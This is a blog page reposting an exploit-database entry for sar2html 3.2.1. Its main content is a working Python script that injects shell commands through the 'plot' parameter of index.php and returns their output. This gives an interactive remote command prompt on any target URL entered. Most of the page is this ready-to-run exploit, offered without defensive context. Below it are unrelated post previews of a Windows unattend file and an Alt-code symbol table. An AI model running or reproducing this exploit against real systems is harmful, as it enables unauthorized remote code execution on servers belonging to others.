# Exploit Title: sar2html 3.2.1 - 'plot' Remote Code Execution

# Date: 27-12-2020

# Exploit Author: Musyoka Ian
# Vendor Homepage:https://github.com/cemtan/sar2html 
# Software Link: https://sourceforge.net/projects/sar2html/
# Version: 3.2.1
# Tested on: Ubuntu 18.04.1

#!/usr/bin/env python3

import requests
import re
from cmd import Cmd

url = input("Enter The url => ")

class Terminal(Cmd):
    prompt = "Command => "
    def default(self, args):
        exploiter(args)

def exploiter(cmd):
    global url
    sess = requests.session()
    output = sess.get(f"{url}/index.php?plot=;{cmd}")
    try:
        out = re.findall("<option value=(.*?)>", output.text)
    except:
        print ("Error!!")
    for ouut in out:
        if "There is no defined host..." not in ouut:
            if "null selected" not in ouut:
                if "selected" not in ouut:
                    print (ouut)
    print ()

if __name__ == ("__main__"):
    terminal = Terminal()
    terminal.cmdloop()


Comentarios

Publicar un comentario

Entradas más populares de este blog

windows usuario

  <?xml version="1.0" encoding="utf-8"?> <unattend xmlns="urn:schemas-microsoft-com:unattend"> <settings pass="oobeSystem"> <component name="Microsoft-Windows-Deployment" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <Reseal> <Mode>OOBE</Mode> </Reseal> </component> <component name="Microsoft-Windows-Shell-Setup" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" xmlns:wcm="http://schemas.microsoft.com/WMIConfig/2002/State" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <OOBE> <HideO
Leer más

juan sebastian castillo

  Símbolo Alt+abcd Símbolo Alt+abcd ☺ Alt- 1 ☻ Alt- 2 ♥ Alt- 3 ♦ Alt- 4 ♣ Alt- 5 ♠ Alt- 6 ● Alt- 7 ◘ Alt- 8 ○ Alt- 9 ◙ Alt- 10 ♂ Alt- 11 ♀ Alt- 12 ♪ Alt- 13 ♫ Alt- 14 ☼ Alt- 15 ► Alt- 16 ◄ Alt- 17 ↕ Alt- 18 ‼ Alt- 19 ¶ Alt- 20 § Alt- 21 ▬ Alt- 22 ↨ Alt- 23 ↑ Alt- 24 ↓ Alt- 25 → Alt- 26 ← Alt- 27 ∟ Alt- 28 ↔ Alt- 29 ▲ Alt- 30 ▼ Alt- 31 espacio Alt- 32 ! Alt- 33 " Alt- 34 # Alt- 35 $ Alt- 36 % Alt- 37 & Alt- 38 ' Alt- 39 ( Alt- 40 ) Alt- 41 * Alt- 42 + Alt- 43 , Alt- 44 - Alt- 45 . Alt- 46 / Alt- 47 0 Alt- 48 1 Alt- 49 2 Alt- 50 3 Alt- 51 4 Alt- 52 5 Alt- 53 6 Alt- 54 7 Alt- 55 8 Alt- 56 9 Alt- 57 : Alt- 58 ; Alt- 59 < Alt- 60 = Alt- 61 > Alt- 62 ? Alt- 63 @ Alt- 64 A Alt- 65 B Alt- 66 C Alt- 67 D Alt- 68 E Alt- 69 F Alt- 70 G Alt- 71 H Alt- 72 I Alt- 73 J Alt- 74 K Alt- 75 L Alt- 76 M Alt- 77 N Alt- 78 O Alt- 79 P Alt- 80 Q Alt- 81 R Alt- 82 S Alt- 83 T Alt- 84 U Alt- 85 V Alt- 86 W Alt- 87 X Alt- 88 Y Alt- 89 Z Alt- 90 [ Alt- 91 \ Alt- 92 ] Alt- 93 ^ Alt- 94 _ Alt- 9
Leer más